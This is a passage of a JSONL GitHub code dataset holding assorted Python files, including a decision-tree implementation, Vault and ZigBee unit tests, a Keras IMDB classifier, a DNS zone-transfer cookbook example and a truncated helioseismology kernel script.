print(best_s[1])\n\n","repo_name":"KedraMichal/n-job-m-machine-sequencing-problem","sub_path":"genetic-algorithm.py","file_name":"genetic-algorithm.py","file_ext":"py","file_size_in_byte":7482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32602223554","text":"word = input('Ingrese una palabra: ')\nlongitud = len(word)\nletras = []\nletrasint = []\nfor i in range(longitud):\n letra = word[i]\n letras.append(letra)\nfor i in range(longitud, 0, -1):\n letra = word[i-1]\n letrasint.append(letra)\nif letrasint == letras:\n print(f'Es un palindromo')\nelse:\n print(f'No es un palindromo')","repo_name":"Santiagonk/Aprende_con_alf","sub_path":"Listas_y_tuplas/Ejercicio_8.py","file_name":"Ejercicio_8.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19819117685","text":"import pandas as pd\r\nimport numpy as np\r\nimport random\r\n\r\nclass decisiontree():\r\n \r\n def __init__(self, counter, min_samples, max_depth, random_subspace):\r\n self.counter = counter\r\n self.min_samples = min_samples\r\n self.max_depth = max_depth\r\n self.random_subspace = random_subspace\r\n\r\n def determine_type_of_feature(self, df):\r\n \r\n feature_types = []\r\n n_unique_values_treshold = 15\r\n for feature in df.columns:\r\n if feature != \"label\":\r\n unique_values = df[feature].unique()\r\n example_value = unique_values[0]\r\n \r\n if (isinstance(example_value, str)) or (len(unique_values) <= n_unique_values_treshold):\r\n feature_types.append(\"categorical\")\r\n else:\r\n feature_types.append(\"continuous\")\r\n \r\n return feature_types\r\n \r\n def check_purity(self, data):\r\n \r\n label_column = data[:, -1]\r\n unique_classes = np.unique(label_column)\r\n \r\n if len(unique_classes) == 1:\r\n return True\r\n else:\r\n return False\r\n \r\n \r\n # 1.2 Classify\r\n def classify_data(self, data):\r\n \r\n label_column = data[:, -1]\r\n unique_classes, counts_unique_classes = np.unique(label_column, return_counts=True)\r\n \r\n index = counts_unique_classes.argmax()\r\n classification = unique_classes[index]\r\n \r\n return classification\r\n \r\n \r\n # 1.3 Potential splits?\r\n def get_potential_splits(self, data):\r\n \r\n potential_splits = {}\r\n _, n_columns = data.shape\r\n column_indices = list(range(n_columns - 1)) # excluding the last column which is the label\r\n \r\n if self.random_subspace and self.random_subspace <= len(column_indices):\r\n column_indices = random.sample(population=column_indices, k=self.random_subspace)\r\n \r\n for column_index in column_indices: \r\n values = data[:, column_index]\r\n unique_values = np.unique(values)\r\n \r\n potential_splits[column_index] = unique_values\r\n \r\n return potential_splits\r\n \r\n \r\n # 1.4 Lowest Overall Entropy?\r\n def calculate_entropy(self, data):\r\n \r\n label_column = data[:, -1]\r\n _, counts = np.unique(label_column, return_counts=True)\r\n \r\n probabilities = counts / counts.sum()\r\n entropy = sum(probabilities * -np.log2(probabilities))\r\n \r\n return entropy\r\n \r\n \r\n def calculate_overall_entropy(self, data_below, data_above):\r\n \r\n n = len(data_below) + len(data_above)\r\n p_data_below = len(data_below) / n\r\n p_data_above = len(data_above) / n\r\n \r\n overall_entropy = (p_data_below * self.calculate_entropy(data_below) \r\n + p_data_above * self.calculate_entropy(data_above))\r\n \r\n return overall_entropy\r\n \r\n \r\n def determine_best_split(self, data, potential_splits):\r\n \r\n overall_entropy = 9999\r\n for column_index in potential_splits:\r\n for value in potential_splits[column_index]:\r\n data_below, data_above = self.split_data(data, split_column=column_index, split_value=value)\r\n current_overall_entropy = self.calculate_overall_entropy(data_below, data_above)\r\n \r\n if current_overall_entropy <= overall_entropy:\r\n overall_entropy = current_overall_entropy\r\n best_split_column = column_index\r\n best_split_value = value\r\n \r\n return best_split_column, best_split_value\r\n \r\n \r\n # 1.5 Split data\r\n def split_data(self, data, split_column, split_value):\r\n \r\n split_column_values = data[:, split_column]\r\n \r\n type_of_feature = FEATURE_TYPES[split_column]\r\n if type_of_feature == \"continuous\":\r\n data_below = data[split_column_values <= split_value]\r\n data_above = data[split_column_values > split_value]\r\n \r\n # feature is categorical \r\n else:\r\n data_below = data[split_column_values == split_value]\r\n data_above = data[split_column_values != split_value]\r\n \r\n return data_below, data_above\r\n \r\n \r\n # 2. Decision Tree Algorithm\r\n def decision_tree_algorithm(self, df):\r\n \r\n # data preparations\r\n if self.counter == 0:\r\n global COLUMN_HEADERS, FEATURE_TYPES\r\n COLUMN_HEADERS = df.columns\r\n FEATURE_TYPES = self.determine_type_of_feature(df)\r\n data = df.values\r\n else:\r\n data = df \r\n \r\n \r\n # base cases\r\n if (self.check_purity(data)) or (len(data) < self.min_samples) or (self.counter == self.max_depth):\r\n classification = self.classify_data(data)\r\n \r\n return classification\r\n \r\n \r\n # recursive part\r\n else: \r\n self.counter += 1\r\n \r\n # helper functions \r\n potential_splits = self.get_potential_splits(data)\r\n split_column, split_value = self.determine_best_split(data, potential_splits)\r\n data_below, data_above = self.split_data(data, split_column, split_value)\r\n \r\n # check for empty data\r\n if len(data_below) == 0 or len(data_above) == 0:\r\n classification = self.classify_data(data)\r\n return classification\r\n \r\n # determine question\r\n feature_name = COLUMN_HEADERS[split_column]\r\n type_of_feature = FEATURE_TYPES[split_column]\r\n if type_of_feature == \"continuous\":\r\n question = \"{} <= {}\".format(feature_name, split_value)\r\n \r\n # feature is categorical\r\n else:\r\n question = \"{} = {}\".format(feature_name, split_value)\r\n \r\n # instantiate sub-tree\r\n sub_tree = {question: []}\r\n \r\n # find answers (recursion)\r\n yes_answer = self.decision_tree_algorithm(data_below)\r\n no_answer = self.decision_tree_algorithm(data_above)\r\n \r\n # If the answers are the same, then there is no point in asking the qestion.\r\n # This could happen when the data is classified even though it is not pure\r\n # yet (self.min_samples or self.max_depth base case).\r\n if yes_answer == no_answer:\r\n sub_tree = yes_answer\r\n else:\r\n sub_tree[question].append(yes_answer)\r\n sub_tree[question].append(no_answer)\r\n \r\n return sub_tree\r\n \r\n \r\n # 3.1 One example\r\n def predict_example(self, example, tree):\r\n \r\n question = list(tree.keys())[0]\r\n feature_name, comparison_operator, value, = question.split(\" \")\r\n \r\n # ask question\r\n if comparison_operator == \"<=\":\r\n if example[feature_name] <= float(value):\r\n answer = tree[question][0]\r\n else:\r\n answer = tree[question][1]\r\n \r\n # feature is categorical\r\n else:\r\n if str(example[feature_name]) == value:\r\n answer = tree[question][0]\r\n else:\r\n answer = tree[question][1]\r\n \r\n # base case\r\n if not isinstance(answer, dict):\r\n return answer\r\n \r\n # recursive part\r\n else:\r\n residual_tree = answer\r\n return self.predict_example(example, residual_tree)\r\n \r\n \r\n def decision_tree_predictions(self, test_df, tree):\r\n predictions = test_df.apply(self.predict_example, args=(tree,), axis=1)\r\n return predictions\r\n \r\n","repo_name":"jacobholmshaw/AutoML-project","sub_path":"Models/decision_trees.py","file_name":"decision_trees.py","file_ext":"py","file_size_in_byte":7934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31760869472","text":"import asyncio\nimport datetime\nfrom pathlib import Path\n\nfrom colorama import Fore\n\nfrom crawler_settings import CrawlerSettings\n\ntracked_images = {} # path, detection_time, mod_time\n\n\ndef retrieve_images(search_dirs, ignore_dirs, extensions):\n images = {}\n\n for search_dir in search_dirs:\n for f in Path(search_dir).rglob('*'):\n if not set(f.parents).isdisjoint(ignore_dirs):\n continue\n if f.suffix in extensions:\n try:\n images[f] = f.stat().st_mtime_ns\n except FileNotFoundError as err:\n if f.is_symlink():\n print(Fore.CYAN, f'File {f} is a symlink')\n else:\n print(Fore.CYAN, f'Error while accessing file {f}')\n print(err)\n return images\n\n\nasync def get_fs_changes(added_images, removed_images, changed_images, interval=5):\n print(CrawlerSettings.EXTENSIONS,\n CrawlerSettings.TRACKED_DIRS,\n CrawlerSettings.IGNORED_DIRS)\n while True:\n crawling_start_time = datetime.datetime.now()\n for image_path, mod_time in retrieve_images(CrawlerSettings.TRACKED_DIRS,\n CrawlerSettings.IGNORED_DIRS,\n CrawlerSettings.EXTENSIONS).items():\n if image_path not in tracked_images:\n await added_images.put(item=image_path)\n elif tracked_images[image_path]['mod_time'] != mod_time:\n await changed_images.put(item=image_path)\n\n tracked_images[image_path] = {'detection_time': crawling_start_time,\n 'mod_time': mod_time}\n\n tracked_image_paths = tuple(tracked_images.keys())\n for tracked_image in tracked_image_paths:\n if tracked_images[tracked_image]['detection_time'] != crawling_start_time:\n await removed_images.put(item=tracked_image)\n tracked_images.pop(tracked_image)\n\n print(Fore.RED, 'SLEEP')\n await asyncio.sleep(interval)\n","repo_name":"VitalyRomanov/illusion","sub_path":"crawler/change_detector.py","file_name":"change_detector.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26178379907","text":"#! /usr/bin/python\n\"\"\"\ntest_zbhub.py\n\nBy James Saunders, 2017\n\nTests PyAlertMe Module.\n\"\"\"\nimport sys\nsys.path.insert(0, '../')\nfrom pyalertme import *\nimport unittest\nfrom mock_serial import Serial\n\n\nclass TestZBHub(unittest.TestCase):\n \"\"\"\n Test PyAlertMe ZBHub Class.\n \"\"\"\n def setUp(self):\n \"\"\"\n Create a node object for each test.\n \"\"\"\n self.maxDiff = None\n self.hub_ser = Serial()\n self.hub_obj = ZBHub(self.hub_ser)\n self.hub_obj.addr_long = b'\\x00\\x1e\\x5e\\x09\\x02\\x14\\xc5\\xab'\n self.hub_obj.addr_short = b'\\x88\\xd2'\n\n self.device_ser = Serial()\n self.device_obj = ZBDevice(self.device_ser)\n\n def tearDown(self):\n \"\"\"\n Teardown node object.\n \"\"\"\n self.hub_obj.halt()\n self.device_obj.halt()\n\n def test_receive_message(self):\n \"\"\"\n Test Receive Message.\n \"\"\"\n # First, lets manually construct a Version message and send it into the Hub.\n message = {\n 'profile': b'\\xc2\\x16',\n 'source_addr': b'\\x92T',\n 'dest_endpoint': b'\\x02',\n 'rf_data': b'\\t\\x00\\xfeT\\x92\\x1b\\xf7r\\x01\\x00o\\r\\x009\\x10\\x07\\x00\\x01(\\x00\\x01\\x0bAlertMe.com\\tSmartPlug\\n2011-07-25',\n 'source_endpoint': b'\\x02',\n 'options': b'\\x01',\n 'source_addr_long': b'\\x00\\ro\\x00\\x01r\\xf7\\x1b',\n 'cluster': b'\\x00\\xf6',\n 'id': 'rx_explicit'\n }\n self.hub_obj.receive_message(message)\n result = self.hub_obj.list_devices()\n expected = {\n '00:0d:6f:00:01:72:f7:1b': {\n 'manu_string': 'AlertMe.com',\n 'type': 'SmartPlug',\n 'hwMajorVersion': 1,\n 'hwMinorVersion': 0,\n }\n }\n self.assertEqual(result, expected)\n\n # Next, lets get the class to generate a Version message and send it into the Hub.\n params = {\n 'type': 'Generic',\n 'hwMajorVersion': 1,\n 'hwMinorVersion': 0,\n 'manu_string': 'PyAlertMe',\n 'manu_date': '2017-01-01'\n }\n message = self.device_obj.generate_message('version_info_update', params)\n message['id'] = 'rx_explicit'\n message['source_addr'] = b'\\x88\\xfd'\n message['source_addr_long'] = b'\\x00\\x0d\\x6f\\x00\\x00\\x00\\xff\\xff'\n message['rf_data'] = message['data']\n self.hub_obj.receive_message(message)\n result = self.hub_obj.list_devices()\n expected = {\n '00:0d:6f:00:01:72:f7:1b': {\n 'type': 'SmartPlug',\n 'hwMajorVersion': 1,\n 'hwMinorVersion': 0,\n 'manu_string': 'AlertMe.com'\n },\n '00:0d:6f:00:00:00:ff:ff': {\n 'type': 'Generic',\n 'hwMajorVersion': 1,\n 'hwMinorVersion': 0,\n 'manu_string': 'PyAlertMe'\n }\n }\n self.assertEqual(result, expected)\n\n # Test get device\n result = self.hub_obj.get_device('00:0d:6f:00:01:72:f7:1b')\n self.assertTrue(result['type'] == 'SmartPlug')\n self.assertTrue(result['hwMajorVersion'] == 1)\n self.assertTrue(result['hwMinorVersion'] == 0)\n\n def test_mock_serial(self):\n \"\"\"\n Test Mock Serial\n \"\"\"\n # Match Descriptor Request\n message = {\n 'source_addr_long': b'\\x00\\x13\\xa2\\x00@\\xa2;\\t',\n 'source_addr': 'RK',\n 'source_endpoint': b'\\x00',\n 'dest_endpoint': b'\\x00',\n 'profile': b'\\x00\\x00',\n 'cluster': b'\\x00\\x06',\n 'id': 'rx_explicit',\n 'options': b'\\x01',\n 'rf_data': b'\\x01\\xfd\\xff\\x16\\xc2\\x00\\x01\\xf0\\x00'\n }\n self.hub_obj.receive_message(message)\n result = self.hub_ser.get_data_written()\n expected = b'~\\x00\\x17}1\\x00\\x00}3\\xa2\\x00@\\xa2;\\tRK\\x02\\x02\\x00\\xf6\\xc2\\x16\\x00\\x00}1\\x00\\xfc\\x97' \n self.assertEqual(result, expected)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"jamesleesaunders/PyAlertMe","sub_path":"tests/test_zbhub.py","file_name":"test_zbhub.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"7488784457","text":"from tkinter import *\nfrom cassandra.cluster import Cluster\n\n# Connect to Cassandra\ncluster = Cluster(['localhost']) # Change to your Cassandra node's IP address\nsession = cluster.connect('demo') # Change to your keyspace name\n\n# Define a function to execute a query\ndef execute_query(query):\n rows = session.execute(query)\n return rows\n\n# Define a function to display the query result in a listbox\ndef display_result(result):\n listbox.delete(0, END)\n for row in result:\n listbox.insert(END, row)\n\n# Define a function to handle button click event\ndef handle_click():\n query = query_entry.get()\n result = execute_query(query)\n display_result(result)\n\n# Create a window\nwindow = Tk()\nwindow.title('Cassandra GUI')\nwindow.geometry('900x900')\n# Create a label\nlabel = Label(window, text='Enter a CQL query:',font=('Arial', 24))\nlabel.pack()\n\n# Create an entry field\nquery_entry = Entry(window)\nquery_entry.pack()\n\n# Create a button\nbutton = Button(window, text='Execute', command=handle_click)\nbutton.pack()\n\n# Create a listbox to display the query result\nlistbox = Listbox(window)\nlistbox.pack()\n\n# Start the GUI main loop\nwindow.mainloop()\n","repo_name":"prathameshraje23/oooooo","sub_path":"Assignment-10 cassandra/cassy9.py","file_name":"cassy9.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21865537785","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy\n\n# getting the data\nimdb = keras.datasets.imdb\n\n#splitting into training data and testing data\n(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)\n\n# print(train_labels[0])\n\n\n\n_word_index = imdb.get_word_index()\n\n#get key , value pairs.\n#v+3 as for special key value pairs.\n\nword_index = {k:(v+3) for k,v in _word_index.items()}\nword_index[\"\"] = 0\nword_index[\"\"] = 1\nword_index[\"\"] = 2 # unknown\nword_index[\"\"] = 3\n\n#reversing to make integer pointing to the word.\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\n\n\n#Since review length differ, making max len review 250, padding shorter reviews with 0.\ntrain_data = keras.preprocessing.sequence.pad_sequences(train_data, value=word_index[\"\"], padding=\"post\", maxlen=250)\ntest_data = keras.preprocessing.sequence.pad_sequences(test_data, value=word_index[\"\"], padding=\"post\", maxlen=250)\n\n\n\n# ? in place of words not found.\n# decode_review to decode it to text.\ndef decode_review(text):\n\treturn \" \".join([reverse_word_index.get(i, \"?\") for i in text])\n\n#see what a review looks like ?\n# print(decode_review(train_data[0]))\n\n#defining model\n\n#embedding layer maps similar words closer 88000 word vectors and 16 dimensions\n#globalaveragepooling1d basically kind of reduces the dimensions.\n# embedding(many dimensions) -> average(few dimensions) -> dense layer(relu) -> dense layer(sigmoid)\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.Embedding(88000, 16))\nmodel.add(keras.layers.GlobalAveragePooling1D())\nmodel.add(keras.layers.Dense(16, activation=\"relu\"))\nmodel.add(keras.layers.Dense(1, activation=\"sigmoid\"))\n\nmodel.summary() # prints a summary of the model\n\n\nmodel.compile(optimizer=\"adam\", loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n\n#about 25000 entry in train data.\n#splitting train data into train and validation data\nx_val = train_data[:10000]\nx_train = train_data[10000:]\n\ny_val = train_labels[:10000]\ny_train = train_labels[10000:]\n\n#batch size is how many movie reviews loading in at once.\nfitted_Model = model.fit(x_train,y_train, epochs=40, batch_size=512, validation_data=(x_val,y_val), verbose=1)\nresults = model.evaluate(test_data,test_labels)\nprint(results)\n\nmodel.save(\"model.h5\")\n\n# test_review = test_data[0]\n# predict = model.predict([test_review])\n# print(\"Review : \")\n# print(decode_review(test_review))\n# print(\"Prediction : \"+str(predict[0]))\n# print(\"Actual : \"+str(test_labels[0]))\n","repo_name":"sarveshbhatnagar/text_classification","sub_path":"basic_classify.py","file_name":"basic_classify.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38614475865","text":"#https://leetcode-cn.com/problems/reverse-bits/\n\nclass Solution:\n def reverseBits(self, n: int) -> int:\n ret, power = 0, 31\n while n:\n ret += (n & 1) << power#最低位与1,然后左移power位,低位补0\n n = n >> 1#向右移动1位,高位补0\n power -= 1#power自减\n return ret\n\nif __name__ == '__main__':\n S = Solution()\n result = S.reverseBits(43261596)\n print(result)","repo_name":"francs1/leetcode_basic_60","sub_path":"leetcode入门60题/04位运算/leetcode190_颠倒二进制位.py","file_name":"leetcode190_颠倒二进制位.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14758081661","text":"import logging\nimport requests_mock\nfrom unittest import TestCase\n\nfrom hvac.api.secrets_engines.database import Database\nfrom hvac.api.secrets_engines.database import DEFAULT_MOUNT_POINT\nfrom hvac.adapters import JSONAdapter\n\n\nclass TestDatabase(TestCase):\n def setUp(self):\n self.database = Database(adapter=JSONAdapter())\n self.expected_status_code = 200\n\n def mock_request(self, method, mock_url, mock_response):\n with requests_mock.mock() as requests_mocker:\n requests_mocker.register_uri(\n method=method,\n url=mock_url,\n status_code=self.expected_status_code,\n json=mock_response,\n )\n return requests_mocker\n\n def test_configure(self):\n name = \"test_db\"\n plugin_name = \"test_plugin\"\n verify_connection = None\n allowed_roles = None\n root_rotation_statements = None\n mount_point = DEFAULT_MOUNT_POINT\n\n mock_url = f\"http://localhost:8200/v1/{mount_point}/config/{name}\"\n mock_response = {\"status_code\": 204} # no response other than status code\n expected_status_code = 204\n\n with self.mock_request(\"POST\", mock_url, mock_response):\n configure_response = self.database.configure(\n name=name,\n plugin_name=plugin_name,\n verify_connection=verify_connection,\n allowed_roles=allowed_roles,\n root_rotation_statements=root_rotation_statements,\n mount_point=mount_point,\n )\n logging.debug(\"configure_response: %s\" % configure_response)\n\n self.assertEqual(configure_response[\"status_code\"], expected_status_code)\n\n def test_rotate_root_credentials(self):\n name = \"test_db\"\n mount_point = DEFAULT_MOUNT_POINT\n\n mock_url = f\"http://localhost:8200/v1/{mount_point}/rotate-root/{name}\"\n mock_response = {\"status_code\": 204} # no response other than status code\n expected_status_code = 204\n\n with self.mock_request(\"POST\", mock_url, mock_response):\n rotate_root_credentials_response = self.database.rotate_root_credentials(\n name=name, mount_point=mount_point\n )\n logging.debug(\n \"rotate_root_credentials_response: %s\" % rotate_root_credentials_response\n )\n self.assertEqual(\n rotate_root_credentials_response[\"status_code\"], expected_status_code\n )\n\n def test_rotate_static_role_credentials(self):\n name = \"test_role\"\n mount_point = DEFAULT_MOUNT_POINT\n\n mock_url = f\"http://localhost:8200/v1/{mount_point}/rotate-role/{name}\"\n mock_response = {\n \"data\": {\"last_vault_rotation\": \"2023-09-25T19:02:38.347994635Z\"}\n }\n\n with self.mock_request(\"POST\", mock_url, mock_response):\n rotate_static_credentials_response = (\n self.database.rotate_static_role_credentials(\n name=name, mount_point=mount_point\n )\n )\n logging.debug(\n \"rotate_static_credentials_response: %s\"\n % rotate_static_credentials_response\n )\n self.assertEqual(rotate_static_credentials_response, mock_response)\n","repo_name":"hvac/hvac","sub_path":"tests/unit_tests/api/secrets_engines/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":1152,"dataset":"github-code","pt":"72"} +{"seq_id":"23658506264","text":"#!/usr/bin/env python\n# Python Network Programming Cookbook, Second Edition -- Chapter - 11\n# This program is optimized for Python 2.7.12 and Python 3.5.2.\n# It may run on any other version with/without modifications.\n\nimport argparse\nimport dns.zone\nimport dns.resolver\nimport socket\n\ndef main(address):\n soa_answer = dns.resolver.query(address, 'SOA')\n master_answer = dns.resolver.query(soa_answer[0].mname, 'A')\n try:\n z = dns.zone.from_xfr(dns.query.xfr(master_answer[0].address, address))\n names = z.nodes.keys()\n names.sort()\n for n in names:\n print(z[n].to_text(n))\n except socket.error as e:\n print('Failed to perform zone transfer:', e)\n except dns.exception.FormError as e:\n print('Failed to perform zone transfer:', e)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='DNS Python')\n parser.add_argument('--address', action=\"store\", dest=\"address\", default='dnspython.org')\n given_args = parser.parse_args() \n address = given_args.address\n main (address)\n\n","repo_name":"PacktPublishing/Python-Network-Programming-Cookbook-Second-Edition","sub_path":"Chapter11/11_4_dns_zone_transfer.py","file_name":"11_4_dns_zone_transfer.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"72"} +{"seq_id":"30904518824","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport functions as fn\nfrom os import getcwd\nimport timing\nclock1 = timing.stopclock()\ntstamp = clock1.lap\n\n\nclass Hkernels:\n \"\"\"This class handles l parameters of the kernel\"\"\"\n #setting up shorthand repeatedly used in kernel evaluation\n\n def __init__(self,n_,l_,m_,n,l,m,s,r_start,r_end):\n self.n = n\n self.l = l\n self.n_ = n_\n self.l_ = l_\n r_full = np.loadtxt('r.dat')\n self.r = r_full[r_start:r_end]\n #ss is m X m X s dim (outer)\n self.mm_, self.mm, self.ss_o = np.meshgrid(m_,m,s, indexing = 'ij')\n #ss_in is s X r dim (inner)\n self.ss_i,__ = np.meshgrid(s,self.r, indexing = 'ij')\n self.r_range = r_start,r_end\n\n def wig_red_o(self,m1,m2,m3):\n '''3j symbol with upper row fixed (outer)'''\n wig_vect = np.vectorize(fn.wig)\n return wig_vect(self.l_,self.ss_o,self.l,m1,m2,m3)\n\n def wig_red(self,m1,m2,m3):\n '''3j symbol with upper row fixed (inner)'''\n wig_vect = np.vectorize(fn.wig)\n return wig_vect(self.l_,self.ss_i,self.l,m1,m2,m3)\n\n def ret_kerns(self):\n n,l,m,n_,l_,m_ = self.n, self.l, self.mm, self.n_, self.l_, self.mm_\n r_start , r_end = self.r_range\n nl = fn.find_nl(n,l)\n nl_ = fn.find_nl(n_,l_)\n\n len_m, len_m_, len_s = np.shape(self.ss_o)\n\n #Savitsky golay filter for smoothening\n window = 45 #must be odd\n order = 3\n\n if(nl == None or nl_ == None):\n print(\"Mode not found. Exiting.\"); exit()\n\n #loading required functions\n eig_dir = (getcwd() + '/eig_files')\n Ui,Vi = fn.load_eig(n,l,eig_dir)\n Ui_,Vi_= fn.load_eig(n_,l_,eig_dir)\n rho = np.loadtxt('rho.dat')\n\n #slicing the radial function acoording to radial grids\n r = self.r\n rho = rho[r_start:r_end]\n Ui = Ui[r_start:r_end]\n Vi = Vi[r_start:r_end]\n Ui_ = Ui_[r_start:r_end]\n Vi_ = Vi_[r_start:r_end]\n\n tstamp()\n om = np.vectorize(fn.omega)\n parity_fac = (-1)**(l+l_+self.ss_o) #parity of selected modes\n prefac = 1./(4.* np.pi) * np.sqrt((2*l_+1.) * (2*self.ss_o+1.) * (2*l+1.) \\\n / (4.* np.pi)) * self.wig_red_o(-m_,m_-m,m)\n tstamp('prefac computation')\n\n #EIGENFUCNTION DERIVATIVES\n\n #smoothing\n\n #interpolation params\n #npts = 30000\n #r_new = np.linspace(np.amin(r),np.amax(r),npts)\n\n\n #Ui,dUi,d2Ui = fn.smooth(U,r,window,order,npts)\n #Vi,dVi,d2Vi = fn.smooth(V,r,window,order,npts)\n\n #Ui_,dUi_,d2Ui_ = fn.smooth(U_,r,window,order,npts)\n #Vi_,dVi_,d2Vi_ = fn.smooth(V_,r,window,order,npts)\n\n #rho_sm, __, __ = fn.smooth(rho,r,window,order,npts)\n ##re-assigning with smoothened variables\n #r = r_new\n #rho = rho_sm\n\n ##no smoothing\n dUi, dVi = np.gradient(Ui,r), np.gradient(Vi,r)\n dUi_, dVi_ = np.gradient(Ui_,r), np.gradient(Vi_,r)\n d2Ui_,d2Vi_ = np.gradient(dUi_,r), np.gradient(dVi_,r)\n tstamp('load eigfiles')\n\n #making U,U_,V,V_,dU,dU_,dV,dV_,d2U,d2U_,d2V,d2V_ of same shape\n\n U = np.tile(Ui,(len_s,1))\n V = np.tile(Vi,(len_s,1))\n dU = np.tile(dUi,(len_s,1))\n dV = np.tile(dVi,(len_s,1))\n U_ = np.tile(Ui_,(len_s,1))\n V_ = np.tile(Vi_,(len_s,1))\n dU_ = np.tile(dUi_,(len_s,1))\n dV_ = np.tile(dVi_,(len_s,1))\n d2U_ = np.tile(d2Ui_,(len_s,1))\n d2V_ = np.tile(d2Vi_,(len_s,1))\n r = np.tile(r,(len_s,1))\n\n tstamp()\n\n #B-- EXPRESSION\n Bmm = -r*(self.wig_red(0,-2,2)*om(l,0)*om(l,2)*V*dU_ + self.wig_red(2,-2,0)*om(l_,0)* \\\n om(l_,2)*V_*dU)\n Bmm += self.wig_red(1,-2,1)*om(l_,0)*om(l,0)*(U-V)*(U_ - V_ + r*dV_)\n Bmm = (((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (Bmm/r**2)[np.newaxis,:,:]\n #B-- EXTRA\n Bmm_ = om(l_,0)*(self.wig_red(2,-2,0)*om(l_,2)*U*(V_ - r*dV_) + om(l,0)*V \\\n *(self.wig_red(3,-2,-1)*om(l_,2)*om(l_,3)*V_ + self.wig_red(1,-2,1) \\\n *(-U_ + V_ + om(l_,2)**2 *V_ - r*dV_)))\n Bmm_ = (((-1)**np.abs(1+m_))*prefac)[:,:,:,np.newaxis] \\\n * (Bmm_/r**2)[np.newaxis,:,:]\n\n# tstamp('Bmm done')\n\n #B0- EXPRESSION\n B0m = self.wig_red(1,-1,0)*om(l_,0)*(U - (om(l,0)**2)*V)*(U_ - V_ + r*dV_)\n B0m += om(l,0)*(om(l_,0)*(self.wig_red(-1,-1,2)*om(l,2)*V*(U_ - V_ + r*dV_) \\\n + 2*r*self.wig_red(2,-1,-1)*om(l_,2)*V_*dV) + self.wig_red(0,-1,1) \\\n *((U-V)*(2*U_ - 2*(om(l_,0)**2)*V_ - r*dU_) + r**2 * dU_*dV))\n\n B0m = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (B0m/r**2)[np.newaxis,:,:]\n \n #B0- EXTRA\n B0m_ = om(l,0)*V*(self.wig_red(2,-1,-1)*om(l_,0)*om(l_,2)*(U_ - 3*V_ + r*dV_) \\\n + self.wig_red(0,-1,1)*((2+om(l_,0)**2)*U_ - 2*r*dU_ + om(l_,0)**2 \\\n *(-3*V_ + r*dV_)))\n B0m_ += self.wig_red(1,-1,0)*om(l_,0)*U*(U_ - V_ - r*(dU_ - dV_ + r*d2V_))\n B0m_ = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (B0m_/r**2)[np.newaxis,:,:]\n# tstamp('B0m done')\n\n #B00 OLD\n B00 = -self.wig_red(0,0,0)*(2*U_ - 2*om(l_,0)**2 * V_ - r*dU_)*(-2*U + 2*om(l,0)**2 *V + \\\n r*dU)\n B00 -= 2*r*(self.wig_red(-1,0,1) + self.wig_red(1,0,-1))*om(l_,0)*om(l,0) \\\n *(U_ - V_ + r*dV_)*dV\n\n # B00 = np.tile(B00,(len_m,len_m_,1,1))\n\n B00 = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (B00/r**2)[np.newaxis,:,:]\n #B00 EXTRA\n B00_ = -(self.wig_red(-1,0,1) + self.wig_red(1,0,-1)) * om(l_,0)*om(l,0) * V*(-4*U_+2*(1+om(l_,0)**2)*V_+r*(dU_-2*dV_))\n B00_ += self.wig_red(0,0,0)*U*(2*U_-2*r*dU_-2*om(l_,0)**2 *(V_-r*dV_)+r*r*d2U_)\n\n #B00_ = np.tile(B00_,(len_m,len_m_,1,1))\n\n B00_ = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (B00_/r**2)[np.newaxis,:,:]\n\n# tstamp('B00 done')\n\n #B+- OLD\n Bpm = -r**2 * self.wig_red(0,0,0)*dU_*dU \n Bpm += om(l_,0)*om(l,0)*(-2*(self.wig_red(-2,0,2)+self.wig_red(2,0,-2))*om(l_,2)*om(l,2)*V_*V \\\n + self.wig_red(-1,0,1)*(U-V)*(U_ - V_ + r*dV_) + self.wig_red(1,0,-1) \\\n *(U-V)*(U_ - V_ + r*dV_))\n\n # Bpm = np.tile(Bpm,(len_m,len_m_,1,1))\n\n Bpm = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (Bpm/r**2)[np.newaxis,:,:]\n #B0+- EXTRA\n Bpm_ = (self.wig_red(-1,0,1) + self.wig_red(1,0,-1)) * om(l_,0)*om(l,0) * V * (U_-V_+r*(-dU_+dV_))\n Bpm_ += self.wig_red(0,0,0) * r*r*U*d2U_\n\n # Bpm_ = np.tile(Bpm_,(len_m,len_m_,1,1))\n\n Bpm_ = 